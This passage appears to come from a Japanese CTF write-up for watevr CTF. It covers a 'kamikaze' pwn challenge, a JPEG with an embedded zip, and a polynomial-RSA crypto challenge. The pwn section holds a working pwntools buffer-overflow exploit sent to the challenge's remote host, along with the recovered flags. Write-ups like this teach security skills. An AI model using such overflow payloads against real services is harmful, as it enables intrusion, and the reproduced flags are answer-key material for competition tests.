  puts("the voting range is 0 to 10. 0 being the worst possible and 10 being the best possible.");
  puts("Thanks!");
  printf("Vote: ");
  fflush(stdout);
  gets(local_a);
  puts("Thanks for voting!");
  return 0;
}

void super_secret_function(void)

{
  int iVar1;
  FILE *__stream;
  char local_9;
  
  __stream = fopen("/home/ctf/flag.txt","r");
  if (__stream == (FILE *)0x0) {
    puts("Cannot open flag.txt");
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  iVar1 = fgetc(__stream);
  local_9 = (char)iVar1;
  while (local_9 != -1) {
    putchar((int)local_9);
    iVar1 = fgetc(__stream);
    local_9 = (char)iVar1;
  }
  fclose(__stream);
                    /* WARNING: Subroutine does not return */
  exit(0);
}

bof脆弱性があるので、それを使ってsuper_secret_functionを呼び出せればよい。

$ gdb -q kamikaze
Reading symbols from kamikaze...(no debugging symbols found)...done.
gdb-peda$ r
Starting program: /mnt/hgfs/Shared/kamikaze 
Hello and welcome to our voting application!
Today's vote will be regarding the administration of
watevr CTF.
the voting range is 0 to 10. 0 being the worst possible and 10 being the best possible.
Thanks!
Vote: AAAAAAAA
Thanks for voting!
[Inferior 1 (process 5432) exited normally]
gdb-peda$ r
Starting program: /mnt/hgfs/Shared/kamikaze 
Hello and welcome to our voting application!
Today's vote will be regarding the administration of
watevr CTF.
the voting range is 0 to 10. 0 being the worst possible and 10 being the best possible.
Thanks!
Vote: AAAAAAAAAAAA
Thanks for voting!

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x0 
RCX: 0x7ffff7b042c0 (<__write_nocancel+7>:	cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd3780 --> 0x0 
RSI: 0x602010 ("Thanks for voti"...)
RDI: 0x1 
RBP: 0x4141414141414141 (b'AAAAAAAA')
RSP: 0x7fffffffdca0 --> 0x1 
RIP: 0x7ffff7004141 
R8 : 0x21676e69746f7620 (b' voting!')
R9 : 0x0 
R10: 0x57 (b'W')
R11: 0x246 
R12: 0x400720 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffdd70 --> 0x1 
R14: 0x0 
R15: 0x0
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x7ffff7004141
[------------------------------------stack-------------------------------------]
Display various information of current execution context
Usage:
    context [reg,code,stack,all] [code/stack length]

0x00007ffff7004141 in ?? ()
gdb-peda$ p &super_secret_function
$1 = (<text variable, no debug info> *) 0x400807 <super_secret_function>

このアドレスを10バイト目から送り込めばよい。

from pwn import *

#p = process('./kamikaze')
p = remote('13.48.67.196', 50000)
ret = p.recv()

payload = ''
payload += 'A' * 10
payload += p64(0x400807)

print ret + payload
p.sendline(payload)

ret = p.recv()
print ret

実行結果は以下の通り。

[+] Opening connection to 13.48.67.196 on port 50000: Done
Hello and welcome to our voting application!
Today's vote will be regarding the administration of
watevr CTF.
the voting range is 0 to 10. 0 being the worst possible and 10 being the best possible.
Thanks!
Vote: AAAAAAAAAA\x07@\x00\x00\x00
Thanks for voting!
watevr{w3ll_th4t_w4s_pr3tty_tr1v1al_anyways_https://www.youtube.com/watch?v=Va4aF6rRdqU}

[*] Closed connection to 13.48.67.196 port 50000
watevr{w3ll_th4t_w4s_pr3tty_tr1v1al_anyways_https://www.youtube.com/watch?v=Va4aF6rRdqU}

Evil Cuteness (forensics)

jpgが添付されている。

$ binwalk kitty.jpg 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
382           0x17E           Copyright string: "Copyright (c) 1998 Hewlett-Packard Company"
21639         0x5487          Zip archive data, at least v2.0 to extract, compressed size: 40, uncompressed size: 42, name: abc
21813         0x5535          End of Zip archive

jpgの後ろにzipがある。

$ binwalk -e kitty.jpg 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
382           0x17E           Copyright string: "Copyright (c) 1998 Hewlett-Packard Company"
21639         0x5487          Zip archive data, at least v2.0 to extract, compressed size: 40, uncompressed size: 42, name: abc
21813         0x5535          End of Zip archive

$ cat _kitty.jpg.extracted/abc
watevr{7h475_4c7u4lly_r34lly_cu73_7h0u6h}
watevr{7h475_4c7u4lly_r34lly_cu73_7h0u6h}

Swedish RSA (crypto)

Polynomial based RSAの問題。nの多項式因数分解したものがp, qとなる。復号したものも多項式になるが、この問題の場合、次数の低いものの係数から順にASCIIコードとして文字にしていけばフラグになる。
コードを組んでいる途中うまくいかなかったので、nの変数yをxに置換した。

#!/usr/bin/env sage -python
def poly_to_bytes(poly):
    s = ''
    poly_elements = poly.split(' + ')[::-1]
    for elem in poly_elements:
        code = int(elem.split('*')[0])
        s += chr(code)
    return s

p = 43753

P = PolynomialRing(GF(p), 'x')

e = 65537
n = P('34036*x^177 + 23068*x^176 + 13147*x^175 + 36344*x^174 + 10045*x^173 + 41049*x^172 + 17786*x^171 + 16601*x^170 + 7929*x^169 + 37570*x^168 + 990*x^167 + 9622*x^166 + 39273*x^165 + 35284*x^164 + 15632*x^163 + 18850*x^162 + 8800*x^161 + 33148*x^160 + 12147*x^159 + 40487*x^158 + 6407*x^157 + 34111*x^156 + 8446*x^155 + 21908*x^154 + 16812*x^153 + 40624*x^152 + 43506*x^151 + 39116*x^150 + 33011*x^149 + 23914*x^148 + 2210*x^147 + 23196*x^146 + 43359*x^145 + 34455*x^144 + 17684*x^143 + 25262*x^142 + 982*x^141 + 24015*x^140 + 27968*x^139 + 37463*x^138 + 10667*x^137 + 39519*x^136 + 31176*x^135 + 27520*x^134 + 32118*x^133 + 8333*x^132 + 38945*x^131 + 34713*x^130 + 1107*x^129 + 43604*x^128 + 4433*x^127 + 18110*x^126 + 17658*x^125 + 32354*x^124 + 3219*x^123 + 40238*x^122 + 10439*x^121 + 3669*x^120 + 8713*x^119 + 21027*x^118 + 29480*x^117 + 5477*x^116 + 24332*x^115 + 43480*x^114 + 33406*x^113 + 43121*x^112 + 1114*x^111 + 17198*x^110 + 22829*x^109 + 24424*x^108 + 16523*x^107 + 20424*x^106 + 36206*x^105 + 41849*x^104 + 3584*x^103 + 26500*x^102 + 31897*x^101 + 34640*x^100 + 27449*x^99 + 30962*x^98 + 41434*x^97 + 22125*x^96 + 24314*x^95 + 3944*x^94 + 18400*x^93 + 38476*x^92 + 28904*x^91 + 27936*x^90 + 41867*x^89 + 25573*x^88 + 25659*x^87 + 33443*x^86 + 18435*x^85 + 5934*x^84 + 38030*x^83 + 17563*x^82 + 24086*x^81 + 36782*x^80 + 20922*x^79 + 38933*x^78 + 23448*x^77 + 10599*x^76 + 7156*x^75 + 29044*x^74 + 23605*x^73 + 7657*x^72 + 28200*x^71 + 2431*x^70 + 3860*x^69 + 23259*x^68 + 14590*x^67 + 33631*x^66 + 15673*x^65 + 36049*x^64 + 29728*x^63 + 22413*x^62 + 18602*x^61 + 18557*x^60 + 23505*x^59 + 17642*x^58 + 12595*x^57 + 17255*x^56 + 15316*x^55 + 8948*x^54 + 38*x^53 + 40329*x^52 + 9823*x^51 + 5798*x^50 + 6379*x^49 + 8662*x^48 + 34640*x^47 + 38321*x^46 + 18760*x^45 + 13135*x^44 + 15926*x^43 + 34952*x^42 + 28940*x^41 + 13558*x^40 + 42579*x^39 + 38015*x^38 + 33788*x^37 + 12381*x^36 + 195*x^35 + 13709*x^34 + 31500*x^33 + 32994*x^32 + 30486*x^31 + 40414*x^30 + 2578*x^29 + 30525*x^28 + 43067*x^27 + 6195*x^26 + 36288*x^25 + 23236*x^24 + 21493*x^23 + 15808*x^22 + 34500*x^21 + 6390*x^20 + 42994*x^19 + 42151*x^18 + 19248*x^17 + 19291*x^16 + 8124*x^15 + 40161*x^14 + 24726*x^13 + 31874*x^12 + 30272*x^11 + 30761*x^10 + 2296*x^9 + 11017*x^8 + 16559*x^7 + 28949*x^6 + 40499*x^5 + 22377*x^4 + 33628*x^3 + 30598*x^2 + 4386*x + 23814')
c = P('5209*x^176 + 10881*x^175 + 31096*x^174 + 23354*x^173 + 28337*x^172 + 15982*x^171 + 13515*x^170 + 21641*x^169 + 10254*x^168 + 34588*x^167 + 27434*x^166 + 29552*x^165 + 7105*x^164 + 22604*x^163 + 41253*x^162 + 42675*x^161 + 21153*x^160 + 32838*x^159 + 34391*x^158 + 832*x^157 + 720*x^156 + 22883*x^155 + 19236*x^154 + 33772*x^153 + 5020*x^152 + 17943*x^151 + 26967*x^150 + 30847*x^149 + 10306*x^148 + 33966*x^147 + 43255*x^146 + 20342*x^145 + 4474*x^144 + 3490*x^143 + 38033*x^142 + 11224*x^141 + 30565*x^140 + 31967*x^139 + 32382*x^138 + 9759*x^137 + 1030*x^136 + 32122*x^135 + 42614*x^134 + 14280*x^133 + 16533*x^132 + 32676*x^131 + 43070*x^130 + 36009*x^129 + 28497*x^128 + 2940*x^127 + 9747*x^126 + 22758*x^125 + 16615*x^124 + 14086*x^123 + 13038*x^122 + 39603*x^121 + 36260*x^120 + 32502*x^119 + 17619*x^118 + 17700*x^117 + 15083*x^116 + 11311*x^115 + 36496*x^114 + 1300*x^113 + 13601*x^112 + 43425*x^111 + 10376*x^110 + 11551*x^109 + 13684*x^108 + 14955*x^107 + 6661*x^106 + 12674*x^105 + 21534*x^104 + 32132*x^103 + 34135*x^102 + 43684*x^101 + 837*x^100 + 29311*x^99 + 4849*x^98 + 26632*x^97 + 26662*x^96 + 10159*x^95 + 32657*x^94 + 12149*x^93 + 17858*x^92 + 35805*x^91 + 19391*x^90 + 30884*x^89 + 42039*x^88 + 17292*x^87 + 4694*x^86 + 1497*x^85 + 1744*x^84 + 31071*x^83 + 26246*x^82 + 24402*x^81 + 22068*x^80 + 39263*x^79 + 23703*x^78 + 21484*x^77 + 12241*x^76 + 28821*x^75 + 32886*x^74 + 43075*x^73 + 35741*x^72 + 19936*x^71 + 37219*x^70 + 33411*x^69 + 8301*x^68 + 12949*x^67 + 28611*x^66 + 42654*x^65 + 6910*x^64 + 18523*x^63 + 31144*x^62 + 21398*x^61 + 36298*x^60 + 27158*x^59 + 918*x^58 + 38601*x^57 + 4269*x^56 + 5699*x^55 + 36444*x^54 + 34791*x^53 + 37978*x^52 + 32481*x^51 + 8039*x^50 + 11012*x^49 + 11454*x^48 + 30450*x^47 + 1381*x^46 + 32403*x^45 + 8202*x^44 + 8404*x^43 + 37648*x^42 + 43696*x^41 + 34237*x^40 + 36490*x^39 + 41423*x^38 + 35792*x^37 + 36950*x^36 + 31086*x^35 + 38970*x^34 + 12439*x^33 + 7963*x^32 + 16150*x^31 + 11382*x^30 + 3038*x^29 + 20157*x^28 + 23531*x^27 + 32866*x^26 + 5428*x^25 + 21132*x^24 + 13443*x^23 + 28909*x^22 + 42716*x^21 + 6567*x^20 + 24744*x^19 + 8727*x^18 + 14895*x^17 + 28172*x^16 + 30903*x^15 + 26608*x^14 + 27314*x^13 + 42224*x^12 + 42551*x^11 + 37726*x^10 + 11203*x^9 + 36816*x^8 + 5537*x^7 + 20301*x^6 + 17591*x^5 + 41279*x^4 + 7999*x^3 + 33753*x^2 + 34551*x + 9659')

P, Q = n.factor()
P, Q = P[0], Q[0]

s = (p^P.degree() - 1) * (p^Q.degree() - 1)
d = inverse_mod(e, s)
m = pow(c, d, n)

flag = poly_to_bytes(str(m))
print flag
watevr{RSA_from_ikea_is_fun_but_insecure#k20944uehdjfnjd335uro}